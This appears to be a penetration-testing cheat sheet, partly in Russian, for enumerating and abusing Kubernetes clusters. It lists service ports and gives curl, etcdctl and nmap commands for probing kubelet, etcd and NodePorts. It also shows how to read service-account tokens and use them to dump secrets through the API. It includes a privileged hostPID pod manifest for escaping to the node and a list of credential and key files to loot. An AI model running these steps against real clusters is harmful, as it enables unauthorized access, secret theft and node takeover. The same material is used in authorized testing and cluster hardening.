KUBER

Kubernetes Enum/Abuse

Ports

Port

Process

Description

443/TCP

kube-apiserver

Kubernetes API port

2379/TCP

etcd

6666/TCP

etcd

4194/TCP

cAdvisor

Container metrics

6443/TCP

kube-apiserver

Kubernetes API port

8443/TCP

kube-apiserver

Minikube API port

8080/TCP

kube-apiserver

Insecure API port

10250/TCP

kubelet

HTTPS API which allows full mode access

10255/TCP

kubelet

Unauthenticated read-only HTTP port: pods, running pods and node state

10256/TCP

kube-proxy

Kube Proxy health check server

10249/TCP

kube-proxy

metrics and configuration information (EKS)

9099/TCP

calico-felix

Health check server for Calico

6782-4/TCP

weave

Metrics and endpoints

30000-32767/TCP

NodePort

Proxy to the services

44134/TCP

Tiller

Helm service listening

Kubelet Api

curl -k https://<IP address>:10250/metrics
curl -k https://<IP address>:10250/pods

If the response is Unauthorized then it requires authentication.

Custom client for kubelet communication - https://github.com/cyberark/kubeletctl

kubelet (Read only)

curl -k https://<IP Address>:10255
http://<external-IP>:10255/pods

etcd API

curl -k https://<IP address>:2379
curl -k https://<IP address>:2379/version
etcdctl --endpoints=http://<MASTER-IP>:2379 get / --prefix --keys-only

NodePort

When a port is exposed in all the nodes via a NodePort, the same port is opened in all the nodes proxifying the traffic into the declared Service. By default this port will be in in the range 30000-32767. So new unchecked services might be accessible through those ports.

sudo nmap -sS -p 30000-32767 <IP>

Dnscan

https://github.com/Esonhugh/k8spider

utility for enum services inside cluster network by PTR record

https://gist.github.com/nirohfeld/c596898673ead369cb8992d97a1c764e

build:

go build -ldflags "-linkmode external -extldflags '-static -s -w'" -o myapp main.go

Network subnets defaults:

10.96.0.0/12 #default kubeadm
10.244.0.0/16 #flannel
10.42.0.0/16,10.43.0.0/16 #k3s
192.168.0.0/16 #calico
10.233.0.0/16 #calico

Service Account

Check SA rights

kubectl auth can-i create --list

По умолчанию Kubernetes хранит все токены и информацию об учетных записях служб в месте по умолчанию. Перейдите туда, чтобы найти полезную информацию.

cd /var/run/secrets/kubernetes.io/serviceaccount/

Теперь мы можем использовать эту информацию для запроса и взаимодействия со службой API Kubernetes с доступными разрешениями и привилегиями.
Чтобы указать имя хоста внутреннего API-сервера, мы можем экспортировать его из переменных среды.

export APISERVER=https://${KUBERNETES_SERVICE_HOST}

Чтобы установить путь к ServiceAccountтокену

export SERVICEACCOUNT=/var/run/secrets/kubernetes.io/serviceaccount

Чтобы установить значение пространства имен

export NAMESPACE=$(cat ${SERVICEACCOUNT}/namespace)

Чтобы прочитать ServiceAccountтокен на предъявителя

export TOKEN=$(cat ${SERVICEACCOUNT}/token)

Чтобы указать ca.crtпуть, чтобы мы могли использовать его при запросе curlзапросов

export CACERT=${SERVICEACCOUNT}/ca.crt

Теперь мы можем изучить API Kubernetes с помощью токена и построенных запросов.

kubectl

kubectl --token=${TOKEN} --server=https://10.233.0.1:443 --insecure-skip-tls-verify=true --namespace=namespace auth can-i --list

curl --cacert ${CACERT} --header "Authorization: Bearer ${TOKEN}" -X GET ${APISERVER}/api

Чтобы запросить доступные секреты в defaultпространстве имен, выполните следующую команду

curl --cacert ${CACERT} --header "Authorization: Bearer ${TOKEN}" -X GET ${APISERVER}/api/v1/secrets

Чтобы запросить секреты, специфичные для пространства имен

curl --cacert ${CACERT} --header "Authorization: Bearer ${TOKEN}" -X GET ${APISERVER}/api/v1/namespaces/${NAMESPACE}/secrets

Получите k8svaulapikeyпользу от секретов

curl --cacert ${CACERT} --header "Authorization: Bearer ${TOKEN}" -X GET ${APISERVER}/api/v1/namespaces/${NAMESPACE}/secrets | grep k8svaultapikey

Bypass Pod Security Admission

This command can show pods that violate the new PodSecurity

kubectl label --dry-run=server --overwrite ns --all \
pod-security.kubernetes.io/enforce=baseline

High privileged service without auth

Longhorn
Weave Scope
flux - have web server which can give the repository through which gitops is maintained, can contain credentials
vector - have graphql api through which you can view logs
flagger - rce by design

Kube objects disclosure

Kube-state-metrics on /metrics can show you object's name. It could be useful when you want to hijack secrets via pod creation

RBAC Abuse

Namespaces

Breaking Boundaries - Kubernetes Namespaces and multi-tenancyblog.amberwolf.com

Bad pod for escape

kubectl run pod-name-bla \
  --image=alpine \
  --restart=Never \
  --tty --stdin \
  --overrides='
{
  "apiVersion": "v1",
  "spec": {
    "hostPID": true,
    "containers": [
      {
        "name": "priv",
        "image": "alpine",
        "command": [ "sh", "-c", "sleep 3600" ],
        "stdin": true,
        "tty": true,
        "securityContext": {
          "privileged": true
        }
      }
    ]
  }
}

Loot on kube nodes

Kube config

/etc/rancher/rke2/rke2.yaml
/etc/kubernetes/admin.conf
/root/.kube
/home/*/.kube
service accounts tokens: /var/lib/kubelet/pods/*/volumes/kubernetes.io~secret/
/etc/kubernetes/pki/ Основной каталог с TLS-сертификатами и ключами control-plane ноды

(api-server, etcd, scheduler, controller-manager). Содержит ca.crt, apiserver.crt, apiserver.key

и другие.

/var/lib/kubelet/pki/ Каталог, где kubelet хранит свои сертификаты для аутентификации

перед API-сервером (обычно kubelet.crt и kubelet.key).

/var/lib/kubelet/ Файл конфигурации kubelet. Может содержать ссылки на пути к

сертификатам или kubeconfig-файлы.

/etc/kubernetes/kubelet.conf kubeconfig-файл для kubelet, содержащий встроенные

сертификаты или ссылки на них.

/etc/kubernetes/**/*.kubeconfig Другие kubeconfig-файлы (например, для scheduler,

controller-manager), которые содержат учетные данные.

/var/lib/rancher/** Актуально для кластеров, развернутых через RKE/RKE2. RKE2 хранит

сертификаты в /var/lib/rancher/rke2/server/tls/.

/opt/rke/** Путь по умолчанию для сертификатов в старых версиях RKE.

PreviousKafka & Zookeeper NextArtifactory

Last updated 22 days ago

hashtagPorts

hashtagKubelet Api

hashtagetcd API

hashtagNodePort

hashtagDnscan

hashtagService Account

hashtagBypass Pod Security Admission

hashtagHigh privileged service without auth

hashtagKube objects disclosure

hashtagRBAC Abuse

hashtagBad pod for escape

hashtagLoot on kube nodes

Ports

Kubelet Api

etcd API

NodePort

Dnscan

Service Account

Bypass Pod Security Admission

High privileged service without auth

Kube objects disclosure

RBAC Abuse

Bad pod for escape

Loot on kube nodes